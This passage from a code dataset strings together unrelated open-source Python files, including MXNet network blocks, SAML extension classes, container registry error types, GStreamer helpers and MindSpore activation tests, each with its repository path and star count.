net = net+scale * tower_out
if with_act:
act = mx.symbol.Activation(
data=net, act_type=act_type, attr=mirror_attr)
return act
else:
return net
def conv_inception(data, num_filter, stride, dim_match, name, binarize, dcn, dilate, **kwargs):
assert not binarize
if stride[0]>1 or not dim_match:
return conv_resnet(data, num_filter, stride, dim_match, name, binarize, dcn, dilate, **kwargs)
conv4 = block35(data, num_filter, name=name+'_block35')
return conv4
def conv_cab(data, num_filter, stride, dim_match, name, binarize, dcn, dilate, **kwargs):
workspace = config.workspace
if stride[0]>1 or not dim_match:
return conv_hpm(data, num_filter, stride, dim_match, name, binarize, dcn, dilate, **kwargs)
cab = CAB(data, num_filter, 1, 4, workspace, name, dilate, 1)
return cab.get()
def conv_block(data, num_filter, stride, dim_match, name, binarize, dcn, dilate):
if config.net_block=='resnet':
return conv_resnet(data, num_filter, stride, dim_match, name, binarize, dcn, dilate)
elif config.net_block=='inception':
return conv_inception(data, num_filter, stride, dim_match, name, binarize, dcn, dilate)
elif config.net_block=='hpm':
return conv_hpm(data, num_filter, stride, dim_match, name, binarize, dcn, dilate)
elif config.net_block=='cab':
return conv_cab(data, num_filter, stride, dim_match, name, binarize, dcn, dilate)
#def lin(data, num_filter, workspace, name, binarize, dcn):
# bit = 1
# ACT_BIT = config.ACT_BIT
# bn_mom = config.bn_mom
# workspace = config.workspace
# if not binarize:
# if not dcn:
# conv1 = Conv(data=data, num_filter=num_filter, kernel=(1,1), stride=(1,1), pad=(0,0),
# no_bias=True, workspace=workspace, name=name + '_conv')
# bn1 = mx.sym.BatchNorm(data=conv1, fix_gamma=False, momentum=bn_mom, eps=2e-5, name=name + '_bn')
# act1 = Act(data=bn1, act_type='relu', name=name + '_relu')
# return act1
# else:
# bn1 = mx.sym.BatchNorm(data=data, fix_gamma=False, momentum=bn_mom, eps=2e-5, name=name + '_bn')
# act1 = Act(data=bn1, act_type='relu', name=name + '_relu')
# conv1_offset = mx.symbol.Convolution(name=name+'_conv_offset', data = act1,
# num_filter=18, pad=(1, 1), kernel=(3, 3), stride=(1, 1))
# conv1 = mx.contrib.symbol.DeformableConvolution(name=name+"_conv", data=act1, offset=conv1_offset,
# num_filter=num_filter, pad=(1,1), kernel=(3, 3), num_deformable_group=1, stride=(1, 1), dilate=(1, 1), no_bias=False)
# #conv1 = Conv(data=act1, num_filter=num_filter, kernel=(3,3), stride=(1,1), pad=(1,1),
# # no_bias=False, workspace=workspace, name=name + '_conv')
# return conv1
# else:
# bn1 = mx.sym.BatchNorm(data=data, fix_gamma=False, momentum=bn_mom, eps=2e-5, name=name + '_bn')
# act1 = Act(data=bn1, act_type='relu', name=name + '_relu')
# conv1 = mx.sym.QConvolution_v1(data=act1, num_filter=num_filter, kernel=(1,1), stride=(1,1), pad=(0,0),
# no_bias=True, workspace=workspace, name=name + '_conv', act_bit=ACT_BIT, weight_bit=bit)
# conv1 = mx.sym.BatchNorm(data=conv1, fix_gamma=False, momentum=bn_mom, eps=2e-5, name=name + '_bn2')
# return conv1
def lin3(data, num_filter, workspace, name, k, g=1, d=1):
bn_mom = config.bn_mom
workspace = config.workspace
if k!=3:
conv1 = Conv(data=data, num_filter=num_filter, kernel=(k,k), stride=(1,1), pad=((k-1)//2,(k-1)//2), num_group=g,
no_bias=True, workspace=workspace, name=name + '_conv')
else:
conv1 = Conv(data=data, num_filter=num_filter, kernel=(k,k), stride=(1,1), pad=(d,d), num_group=g, dilate=(d, d),
no_bias=True, workspace=workspace, name=name + '_conv')
bn1 = mx.sym.BatchNorm(data=conv1, fix_gamma=False, momentum=bn_mom, eps=2e-5, name=name + '_bn')
act1 = Act(data=bn1, act_type='relu', name=name + '_relu')
ret = act1
return ret
class CAB:
def __init__(self, data, nFilters, nModules, n, workspace, name, dilate, group):
self.data = data
self.nFilters = nFilters
self.nModules = nModules
self.n = n
self.workspace = workspace
self.name = name
self.dilate = dilate
self.group = group
self.sym_map = {}
def get_output(self, w, h):
key = (w, h)
if key in self.sym_map:
return self.sym_map[key]
ret = None
if h==self.n:
if w==self.n:
ret = (self.data, self.nFilters)
else:
x = self.get_output(w+1, h)
f = int(x[1]*0.5)
if w!=self.n-1:
body = lin3(x[0], f, self.workspace, "%s_w%d_h%d_1"%(self.name, w, h), 3, self.group, 1)
else:
body = lin3(x[0], f, self.workspace, "%s_w%d_h%d_1"%(self.name, w, h), 3, self.group, self.dilate)
ret = (body,f)
else:
x = self.get_output(w+1, h+1)
y = self.get_output(w, h+1)
if h%2==1 and h!=w:
xbody = lin3(x[0], x[1], self.workspace, "%s_w%d_h%d_2"%(self.name, w, h), 3, x[1])
#xbody = xbody+x[0]
else:
xbody = x[0]
#xbody = x[0]
#xbody = lin3(x[0], x[1], self.workspace, "%s_w%d_h%d_2"%(self.name, w, h), 3, x[1])
if w==0:
ybody = lin3(y[0], y[1], self.workspace, "%s_w%d_h%d_3"%(self.name, w, h), 3, self.group)
else:
ybody = y[0]
ybody = mx.sym.concat(y[0], ybody, dim=1)
body = mx.sym.add_n(xbody,ybody, name="%s_w%d_h%d_add"%(self.name, w, h))
body = body/2
ret = (body, x[1])
self.sym_map[key] = ret
return ret
def get(self):
return self.get_output(1, 1)[0] |
metaflow/plugins/env_escape/configurations/test_lib_impl/test_lib.py | RobBlumberg/metaflow | 5,821 | 16817 | <filename>metaflow/plugins/env_escape/configurations/test_lib_impl/test_lib.py
import functools
class MyBaseException(Exception):
pass
class SomeException(MyBaseException):
pass
class TestClass1(object):
cls_object = 25
def __init__(self, value):
self._value = value
self._value2 = 123
def unsupported_method(self):
pass
def print_value(self):
return self._value
def __str__(self):
return "My str representation is %s" % str(self._value)
def __repr__(self):
return "My repr representation is %s" % str(self._value)
@property
def value(self):
return self._value
@value.setter
def value(self, value):
self._value = value
def to_class2(self, count, stride=1):
return TestClass2(self._value, stride, count)
@staticmethod
def somethingstatic(val):
return val + 42
@classmethod
def somethingclass(cls):
return cls.cls_object
@property
def override_value(self):
return self._value2
@override_value.setter
def override_value(self, value):
self._value2 = value
class TestClass2(object):
def __init__(self, value, stride, count):
self._mylist = [value + stride * i for i in range(count)]
def something(self, val):
return "In Test2 with %s" % val
def __iter__(self):
self._pos = 0
return self
def __next__(self):
if self._pos < len(self._mylist):
self._pos += 1
return self._mylist[self._pos - 1]
raise StopIteration
class TestClass3(object):
def __init__(self):
print("I am Class3")
def thirdfunction(self, val):
print("Got value: %s" % val)
# raise AttributeError("Some weird error")
def raiseSomething(self):
raise SomeException("Something went wrong")
def __hidden(self, name, value):
setattr(self, name, value)
def weird_indirection(self, name):
return functools.partial(self.__hidden, name)
def test_func(*args, **kwargs):
return "In test func"
test_value = 1
|
src/saml2/extension/pefim.py | cnelson/pysaml2 | 5,079 | 16825 | #!/usr/bin/env python
import saml2
from saml2 import SamlBase
from saml2.xmldsig import KeyInfo
NAMESPACE = 'urn:net:eustix:names:tc:PEFIM:0.0:assertion'
class SPCertEncType_(SamlBase):
"""The urn:net:eustix:names:tc:PEFIM:0.0:assertion:SPCertEncType element """
c_tag = 'SPCertEncType'
c_namespace = NAMESPACE
c_children = SamlBase.c_children.copy()
c_attributes = SamlBase.c_attributes.copy()
c_child_order = SamlBase.c_child_order[:]
c_cardinality = SamlBase.c_cardinality.copy()
c_children['{http://www.w3.org/2000/09/xmldsig#}KeyInfo'] = ('key_info',
[KeyInfo])
c_cardinality['key_info'] = {"min": 1}
c_attributes['VerifyDepth'] = ('verify_depth', 'unsignedByte', False)
c_child_order.extend(['key_info'])
def __init__(self,
key_info=None,
x509_data=None,
verify_depth='1',
text=None,
extension_elements=None,
extension_attributes=None):
SamlBase.__init__(self,
text=text,
extension_elements=extension_elements,
extension_attributes=extension_attributes)
if key_info:
self.key_info = key_info
elif x509_data:
self.key_info = KeyInfo(x509_data=x509_data)
else:
self.key_info = []
self.verify_depth = verify_depth
#self.x509_data = x509_data
def spcertenc_type__from_string(xml_string):
return saml2.create_class_from_xml_string(SPCertEncType_, xml_string)
class SPCertEnc(SPCertEncType_):
"""The urn:net:eustix:names:tc:PEFIM:0.0:assertion:SPCertEnc element """
c_tag = 'SPCertEnc'
c_namespace = NAMESPACE
c_children = SPCertEncType_.c_children.copy()
c_attributes = SPCertEncType_.c_attributes.copy()
c_child_order = SPCertEncType_.c_child_order[:]
c_cardinality = SPCertEncType_.c_cardinality.copy()
def spcertenc_from_string(xml_string):
return saml2.create_class_from_xml_string(SPCertEnc, xml_string)
ELEMENT_FROM_STRING = {
SPCertEnc.c_tag: spcertenc_from_string,
SPCertEncType_.c_tag: spcertenc_type__from_string,
}
ELEMENT_BY_TAG = {
'SPCertEnc': SPCertEnc,
'SPCertEncType': SPCertEncType_,
}
def factory(tag, **kwargs):
return ELEMENT_BY_TAG[tag](**kwargs) |
scripts/tfloc_summary.py | lldelisle/bx-python | 122 | 16827 | <filename>scripts/tfloc_summary.py
#!/usr/bin/env python
"""
Read TFLOC output from stdin and write out a summary in which the nth line
contains the number of sites found in the nth alignment of the input.
TODO: This is very special case, should it be here?
"""
import sys
from collections import defaultdict
counts = defaultdict(int)
max_index = -1
for line in sys.stdin:
if line[0].isdigit():
current_index = int(line)
max_index = max(current_index, max_index)
elif line[0] == "'":
counts[current_index] += 1
else:
raise ValueError("Invalid input line " + line)
for i in range(max_index + 1):
print(counts.get(i, 0))
|
s3prl/upstream/example/hubconf.py | hhhaaahhhaa/s3prl | 856 | 16833 | from .expert import UpstreamExpert as _UpstreamExpert
def customized_upstream(*args, **kwargs):
"""
To enable your customized pretrained model, you only need to implement
upstream/example/expert.py and leave this file as is. This file is
used to register the UpstreamExpert in upstream/example/expert.py
The following is a brief introduction of the registration mechanism.
The s3prl/hub.py will collect all the entries registered in this file
(callable variables without the underscore prefix) as a centralized
upstream factory. One can pick up this upstream from the factory via
1.
from s3prl.hub import customized_upstream
model = customized_upstream(ckpt, model_config)
2.
model = torch.hub.load(
'your_s3prl_path',
'customized_upstream',
ckpt,
model_config,
source='local',
)
Our run_downstream.py and downstream/runner.py follows the first usage
"""
return _UpstreamExpert(*args, **kwargs)
|
pycsw/pycsw/plugins/profiles/profile.py | Geosoft2/Geosoftware-II-AALLH | 118 | 16841 | # -*- coding: utf-8 -*-
# =================================================================
#
# Authors: <NAME> <<EMAIL>>
# <NAME> <<EMAIL>>
#
# Copyright (c) 2015 <NAME>
# Copyright (c) 2015 <NAME>
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation
# files (the "Software"), to deal in the Software without
# restriction, including without limitation the rights to use,
# copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the
# Software is furnished to do so, subject to the following
# conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES
# OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT
# HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
# WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR
# OTHER DEALINGS IN THE SOFTWARE.
#
# =================================================================
import os
import warnings
class Profile(object):
''' base Profile class '''
def __init__(self, name, version, title, url,
namespace, typename, outputschema, prefixes, model, core_namespaces,
added_namespaces,repository):
''' Initialize profile '''
self.name = name
self.version = version
self.title = title
self.url = url
self.namespace = namespace
self.typename = typename
self.outputschema = outputschema
self.prefixes = prefixes
self.repository = repository
if 'DescribeRecord' in model['operations']:
model['operations']['DescribeRecord']['parameters']\
['typeName']['values'].append(self.typename)
model['operations']['GetRecords']['parameters']['outputSchema']\
['values'].append(self.outputschema)
model['operations']['GetRecords']['parameters']['typeNames']\
['values'].append(self.typename)
model['operations']['GetRecordById']['parameters']['outputSchema']\
['values'].append(self.outputschema)
if 'Harvest' in model['operations']:
model['operations']['Harvest']['parameters']['ResourceType']\
['values'].append(self.outputschema)
# namespaces
core_namespaces.update(added_namespaces)
# repository
model['typenames'][self.typename] = self.repository
def extend_core(self, model, namespaces, config):
''' Extend config.model and config.namespaces '''
raise NotImplementedError
def check_parameters(self):
''' Perform extra parameters checking.
Return dict with keys "locator", "code", "text" or None '''
raise NotImplementedError
def get_extendedcapabilities(self):
''' Return ExtendedCapabilities child as lxml.etree.Element '''
raise NotImplementedError
def get_schemacomponents(self):
''' Return schema components as lxml.etree.Element list '''
raise NotImplementedError
def check_getdomain(self, kvp):
'''Perform extra profile specific checks in the GetDomain request'''
raise NotImplementedError
def write_record(self, result, esn, outputschema, queryables):
''' Return csw:SearchResults child as lxml.etree.Element '''
raise NotImplementedError
def transform2dcmappings(self, queryables):
''' Transform information model mappings into csw:Record mappings '''
raise NotImplementedError
def load_profiles(path, cls, profiles):
''' load CSW profiles, return dict by class name '''
def look_for_subclass(modulename):
module = __import__(modulename)
dmod = module.__dict__
for modname in modulename.split('.')[1:]:
dmod = dmod[modname].__dict__
for key, entry in dmod.items():
if key == cls.__name__:
continue
try:
if issubclass(entry, cls):
aps['plugins'][key] = entry
except TypeError:
continue
aps = {}
aps['plugins'] = {}
aps['loaded'] = {}
for prof in profiles.split(','):
# fgdc, atom, dif, gm03 are supported in core
# no need to specify them explicitly anymore
# provide deprecation warning
# https://github.com/geopython/pycsw/issues/118
if prof in ['fgdc', 'atom', 'dif', 'gm03']:
warnings.warn('%s is now a core module, and does not need to be'
' specified explicitly. So you can remove %s from '
'server.profiles' % (prof, prof))
else:
modulename='%s.%s.%s' % (path.replace(os.sep, '.'), prof, prof)
look_for_subclass(modulename)
return aps
|
nngeometry/object/__init__.py | amyami187/nngeometry | 103 | 16852 | from .pspace import (PMatDense, PMatBlockDiag, PMatDiag,
PMatLowRank, PMatImplicit,
PMatKFAC, PMatEKFAC, PMatQuasiDiag)
from .vector import (PVector, FVector)
from .fspace import (FMatDense,)
from .map import (PushForwardDense, PushForwardImplicit,
PullBackDense)
|
endpoints/v2/errors.py | giuseppe/quay | 2,027 | 16855 | import bitmath
class V2RegistryException(Exception):
def __init__(
self,
error_code_str,
message,
detail,
http_status_code=400,
repository=None,
scopes=None,
is_read_only=False,
):
super(V2RegistryException, self).__init__(message)
self.http_status_code = http_status_code
self.repository = repository
self.scopes = scopes
self.is_read_only = is_read_only
self._error_code_str = error_code_str
self._detail = detail
def as_dict(self):
error_dict = {
"code": self._error_code_str,
"message": str(self),
"detail": self._detail if self._detail is not None else {},
}
if self.is_read_only:
error_dict["is_readonly"] = True
return error_dict
class BlobUnknown(V2RegistryException):
def __init__(self, detail=None):
super(BlobUnknown, self).__init__("BLOB_UNKNOWN", "blob unknown to registry", detail, 404)
class BlobUploadInvalid(V2RegistryException):
def __init__(self, detail=None):
super(BlobUploadInvalid, self).__init__(
"BLOB_UPLOAD_INVALID", "blob upload invalid", detail
)
class BlobUploadUnknown(V2RegistryException):
def __init__(self, detail=None):
super(BlobUploadUnknown, self).__init__(
"BLOB_UPLOAD_UNKNOWN", "blob upload unknown to registry", detail, 404
)
class DigestInvalid(V2RegistryException):
def __init__(self, detail=None):
super(DigestInvalid, self).__init__(
"DIGEST_INVALID", "provided digest did not match uploaded content", detail
)
class ManifestBlobUnknown(V2RegistryException):
def __init__(self, detail=None):
super(ManifestBlobUnknown, self).__init__(
"MANIFEST_BLOB_UNKNOWN", "manifest blob unknown to registry", detail
)
class ManifestInvalid(V2RegistryException):
def __init__(self, detail=None, http_status_code=400):
super(ManifestInvalid, self).__init__(
"MANIFEST_INVALID", "manifest invalid", detail, http_status_code
)
class ManifestUnknown(V2RegistryException):
def __init__(self, detail=None):
super(ManifestUnknown, self).__init__("MANIFEST_UNKNOWN", "manifest unknown", detail, 404)
class TagExpired(V2RegistryException):
def __init__(self, message=None, detail=None):
super(TagExpired, self).__init__("TAG_EXPIRED", message or "Tag has expired", detail, 404)
class ManifestUnverified(V2RegistryException):
def __init__(self, detail=None):
super(ManifestUnverified, self).__init__(
"MANIFEST_UNVERIFIED", "manifest failed signature verification", detail
)
class NameInvalid(V2RegistryException):
def __init__(self, detail=None, message=None):
super(NameInvalid, self).__init__(
"NAME_INVALID", message or "invalid repository name", detail
)
class NameUnknown(V2RegistryException):
def __init__(self, detail=None):
super(NameUnknown, self).__init__(
"NAME_UNKNOWN", "repository name not known to registry", detail, 404
)
class SizeInvalid(V2RegistryException):
def __init__(self, detail=None):
super(SizeInvalid, self).__init__(
"SIZE_INVALID", "provided length did not match content length", detail
)
class TagAlreadyExists(V2RegistryException):
def __init__(self, detail=None):
super(TagAlreadyExists, self).__init__(
"TAG_ALREADY_EXISTS", "tag was already pushed", detail, 409
)
class TagInvalid(V2RegistryException):
def __init__(self, detail=None):
super(TagInvalid, self).__init__("TAG_INVALID", "manifest tag did not match URI", detail)
class LayerTooLarge(V2RegistryException):
def __init__(self, uploaded=None, max_allowed=None):
detail = {}
message = "Uploaded blob is larger than allowed by this registry"
if uploaded is not None and max_allowed is not None:
detail = {
"reason": "%s is greater than maximum allowed size %s" % (uploaded, max_allowed),
"max_allowed": max_allowed,
"uploaded": uploaded,
}
up_str = bitmath.Byte(uploaded).best_prefix().format("{value:.2f} {unit}")
max_str = bitmath.Byte(max_allowed).best_prefix().format("{value:.2f} {unit}")
message = "Uploaded blob of %s is larger than %s allowed by this registry" % (
up_str,
max_str,
)
class Unauthorized(V2RegistryException):
def __init__(self, detail=None, repository=None, scopes=None):
super(Unauthorized, self).__init__(
"UNAUTHORIZED",
"access to the requested resource is not authorized",
detail,
401,
repository=repository,
scopes=scopes,
)
class Unsupported(V2RegistryException):
def __init__(self, detail=None, message=None):
super(Unsupported, self).__init__(
"UNSUPPORTED", message or "The operation is unsupported.", detail, 405
)
class InvalidLogin(V2RegistryException):
def __init__(self, message=None):
super(InvalidLogin, self).__init__(
"UNAUTHORIZED", message or "Specified credentials are invalid", {}, 401
)
class InvalidRequest(V2RegistryException):
def __init__(self, message=None):
super(InvalidRequest, self).__init__(
"INVALID_REQUEST", message or "Invalid request", {}, 400
)
class NamespaceDisabled(V2RegistryException):
def __init__(self, message=None):
message = message or "This namespace is disabled. Please contact your system administrator."
super(NamespaceDisabled, self).__init__("DENIED", message, {}, 405)
class BlobDownloadGeoBlocked(V2RegistryException):
def __init__(self, detail=None):
message = (
"The region from which you are pulling has been geo-ip blocked. "
+ "Please contact the namespace owner."
)
super(BlobDownloadGeoBlocked, self).__init__("DENIED", message, detail, 403)
class ReadOnlyMode(V2RegistryException):
def __init__(self, detail=None):
message = (
"System is currently read-only. Pulls will succeed but all write operations "
+ "are currently suspended."
)
super(ReadOnlyMode, self).__init__("DENIED", message, detail, 405, is_read_only=True)
|
DeepBrainSeg/readers/nib.py | JasperHG90/DeepBrainSeg | 130 | 16872 | <reponame>JasperHG90/DeepBrainSeg
#! /usr/bin/env python
# -*- coding: utf-8 -*-
#
# author: <NAME>
# contact: <EMAIL>
# MIT License
# Copyright (c) 2020 <NAME>
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import os
import tempfile
from time import time
import datetime
import numpy as np
import nibabel as nib
class nib_loader(object):
"""
"""
def __init__(self):
pass
def load_vol(self, path):
"""
path : patient data path
returns numpy array of patient data
"""
self.patient = nib.load(path)
self.affine = self.patient.affine
return self.patient.get_data()
def write_vol(self, path, volume):
"""
path : path to write the data
vol : modifient volume
return: True or False based on saving of volume
"""
try:
volume = np.uint8(volume)
volume = nib.Nifti1Image(volume, self.affine)
volume.set_data_dtype(np.uint8)
nib.save(volume, path)
return True
except:
return False
|
terrascript/resource/ddelnano/mikrotik.py | mjuenema/python-terrascript | 507 | 16884 | <filename>terrascript/resource/ddelnano/mikrotik.py
# terrascript/resource/ddelnano/mikrotik.py
# Automatically generated by tools/makecode.py (24-Sep-2021 15:21:43 UTC)
import terrascript
class mikrotik_bgp_instance(terrascript.Resource):
pass
class mikrotik_bgp_peer(terrascript.Resource):
pass
class mikrotik_dhcp_lease(terrascript.Resource):
pass
class mikrotik_dns_record(terrascript.Resource):
pass
class mikrotik_pool(terrascript.Resource):
pass
class mikrotik_scheduler(terrascript.Resource):
pass
class mikrotik_script(terrascript.Resource):
pass
__all__ = [
"mikrotik_bgp_instance",
"mikrotik_bgp_peer",
"mikrotik_dhcp_lease",
"mikrotik_dns_record",
"mikrotik_pool",
"mikrotik_scheduler",
"mikrotik_script",
]
|
Codes/Liam/203_remove_linked_list_elements.py | liuxiaohui1221/algorithm | 256 | 16886 | <filename>Codes/Liam/203_remove_linked_list_elements.py
# 执行用时 : 68 ms
# 内存消耗 : 16.6 MB
# 方案:哨兵结点 sentinel,插入在head结点之前
# Definition for singly-linked list.
# class ListNode:
# def __init__(self, x):
# self.val = x
# self.next = None
class Solution:
def removeElements(self, head: ListNode, val: int) -> ListNode:
# 哨兵结点 sentinel,插入在head结点之前
sentinel = ListNode(0)
sentinel.next = head
# 初始化两个指针 curr 和 prev
prev, curr = sentinel, head
while curr:
if curr.val == val:
prev.next = curr.next
else:
prev = curr
# 遍历下一个元素
curr = curr.next
return sentinel.next
|
mopidy/audio/utils.py | grdorin/mopidy | 6,700 | 16898 | <filename>mopidy/audio/utils.py
from mopidy import httpclient
from mopidy.internal.gi import Gst
def calculate_duration(num_samples, sample_rate):
"""Determine duration of samples using GStreamer helper for precise
math."""
return Gst.util_uint64_scale(num_samples, Gst.SECOND, sample_rate)
def create_buffer(data, timestamp=None, duration=None):
"""Create a new GStreamer buffer based on provided data.
Mainly intended to keep gst imports out of non-audio modules.
.. versionchanged:: 2.0
``capabilites`` argument was removed.
"""
if not data:
raise ValueError("Cannot create buffer without data")
buffer_ = Gst.Buffer.new_wrapped(data)
if timestamp is not None:
buffer_.pts = timestamp
if duration is not None:
buffer_.duration = duration
return buffer_
def millisecond_to_clocktime(value):
"""Convert a millisecond time to internal GStreamer time."""
return value * Gst.MSECOND
def clocktime_to_millisecond(value):
"""Convert an internal GStreamer time to millisecond time."""
return value // Gst.MSECOND
def supported_uri_schemes(uri_schemes):
"""Determine which URIs we can actually support from provided whitelist.
:param uri_schemes: list/set of URIs to check support for.
:type uri_schemes: list or set or URI schemes as strings.
:rtype: set of URI schemes we can support via this GStreamer install.
"""
supported_schemes = set()
registry = Gst.Registry.get()
for factory in registry.get_feature_list(Gst.ElementFactory):
for uri in factory.get_uri_protocols():
if uri in uri_schemes:
supported_schemes.add(uri)
return supported_schemes
def setup_proxy(element, config):
"""Configure a GStreamer element with proxy settings.
:param element: element to setup proxy in.
:type element: :class:`Gst.GstElement`
:param config: proxy settings to use.
:type config: :class:`dict`
"""
if not hasattr(element.props, "proxy") or not config.get("hostname"):
return
element.set_property("proxy", httpclient.format_proxy(config, auth=False))
element.set_property("proxy-id", config.get("username"))
element.set_property("proxy-pw", config.get("password"))
class Signals:
"""Helper for tracking gobject signal registrations"""
def __init__(self):
self._ids = {}
def connect(self, element, event, func, *args):
"""Connect a function + args to signal event on an element.
Each event may only be handled by one callback in this implementation.
"""
if (element, event) in self._ids:
raise AssertionError
self._ids[(element, event)] = element.connect(event, func, *args)
def disconnect(self, element, event):
"""Disconnect whatever handler we have for an element+event pair.
Does nothing it the handler has already been removed.
"""
signal_id = self._ids.pop((element, event), None)
if signal_id is not None:
element.disconnect(signal_id)
def clear(self):
"""Clear all registered signal handlers."""
for element, event in list(self._ids):
element.disconnect(self._ids.pop((element, event)))
|
turbinia/processors/archive_test.py | sa3eed3ed/turbinia | 559 | 16903 | <filename>turbinia/processors/archive_test.py
# -*- coding: utf-8 -*-
# Copyright 2019 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests for the Archive processor to compress and decompress folders."""
from __future__ import unicode_literals
import os
import tarfile
import unittest
import tempfile
from random import randint
from shutil import rmtree
from turbinia.processors import archive
from turbinia import TurbiniaException
class ArchiveProcessorTest(unittest.TestCase):
"""Tests for Archive Processor."""
def setUp(self):
# Setup testing directories/variables.
self.test_files = []
self.base_output_dir = tempfile.mkdtemp(prefix='turbinia-test-local')
self.tmp_files_dir = os.path.join(self.base_output_dir, 'files')
self.tmp_archive = os.path.join(self.base_output_dir, 'files.tar.gz')
if not os.path.exists(self.tmp_files_dir):
os.makedirs(self.tmp_files_dir)
# Generate text files containing random numbers.
file_max = 10
counter = 0
while counter <= file_max:
file_name = 'file{0:s}.txt'.format(str(counter))
file_path = os.path.join(self.tmp_files_dir, file_name)
file_open = open(file_path, 'w+')
rand_nums = [randint(0, 1000) for i in range(50)]
for i in rand_nums:
file_open.write('%s\n' % str(i))
file_open.close()
counter += 1
self.test_files.append(file_name)
archive.CompressDirectory(self.tmp_files_dir)
def tearDown(self):
# Remove testing directory for this unit test.
if os.path.exists(self.base_output_dir):
rmtree(self.base_output_dir)
def test_compressed_dir(self):
"""Tests the compression function"""
# Check if compressed directory matches expected output path.
self.assertEqual(
archive.CompressDirectory(self.tmp_files_dir), self.tmp_archive)
# Check to confirm that the archive is gzip format.
self.assertEqual(tarfile.is_tarfile(self.tmp_archive), True)
# Raise assertion if folder does not exist.
with self.assertRaises(TurbiniaException):
archive.CompressDirectory('blah')
def test_validate_tarfile(self):
"""Tests the validate function used to decompress tar files"""
# Raise exception for file that does not exist.
with self.assertRaises(TurbiniaException):
archive.ValidateTarFile('blah.no')
# Raise exception for a file with unsupported extension.
with self.assertRaises(TurbiniaException):
archive.ValidateTarFile(self.tmp_files_dir)
if __name__ == '__main__':
unittest.main()
|
app/pathfinding/finder/__init__.py | TheronHa/Spaghetti | 208 | 16916 | __all__ = ['a_star', 'best_first', 'bi_a_star', 'breadth_first', 'dijkstra',
'finder', 'ida_star']
|
tests/ut/python/nn/test_activation.py | PowerOlive/mindspore | 3,200 | 16919 | <filename>tests/ut/python/nn/test_activation.py
# Copyright 2020 Huawei Technologies Co., Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
""" test Activations """
import numpy as np
import mindspore.nn as nn
from mindspore import Tensor
from mindspore.common.api import _cell_graph_executor
from ..ut_filter import non_graph_engine
class SoftmaxNet(nn.Cell):
def __init__(self, dim):
super(SoftmaxNet, self).__init__()
self.softmax = nn.Softmax(dim)
def construct(self, x):
return self.softmax(x)
@non_graph_engine
def test_compile():
net = SoftmaxNet(0)
input_tensor = Tensor(np.array([[1.2, 2.1], [2.2, 3.2]], dtype=np.float32))
net(input_tensor)
@non_graph_engine
def test_compile_axis():
net = SoftmaxNet(-1)
prob = 355
input_data = np.random.randn(4, 16, 1, 1).astype(np.float32) * prob
input_tensor = Tensor(input_data)
net(input_tensor)
class LogSoftmaxNet(nn.Cell):
def __init__(self, dim):
super(LogSoftmaxNet, self).__init__()
self.logsoftmax = nn.LogSoftmax(dim)
def construct(self, x):
return self.logsoftmax(x)
@non_graph_engine
def test_compile_logsoftmax():
net = LogSoftmaxNet(0)
input_tensor = Tensor(np.array([[1.2, 2.1], [2.2, 3.2]], dtype=np.float32))
net(input_tensor)
class Net1(nn.Cell):
def __init__(self):
super(Net1, self).__init__()
self.relu = nn.ReLU()
def construct(self, x):
return self.relu(x)
def test_compile_relu():
net = Net1()
input_data = Tensor(np.array([[1.2, 2.1], [2.2, 3.2]], dtype=np.float32))
_cell_graph_executor.compile(net, input_data)
class Net_gelu(nn.Cell):
def __init__(self):
super(Net_gelu, self).__init__()
self.gelu = nn.GELU()
def construct(self, x):
return self.gelu(x)
def test_compile_gelu():
net = Net_gelu()
input_data = Tensor(np.array([[1.2, 2.1], [2.2, 3.2]], dtype=np.float32))
_cell_graph_executor.compile(net, input_data)
class NetLeakyReLU(nn.Cell):
def __init__(self, alpha):
super(NetLeakyReLU, self).__init__()
self.leaky_relu = nn.LeakyReLU(alpha)
def construct(self, x):
return self.leaky_relu(x)
def test_compile_leaky_relu():
net = NetLeakyReLU(alpha=0.1)
input_data = Tensor(np.array([[1.6, 0, 0.6], [6, 0, -6]], dtype=np.float32))
_cell_graph_executor.compile(net, input_data)
|
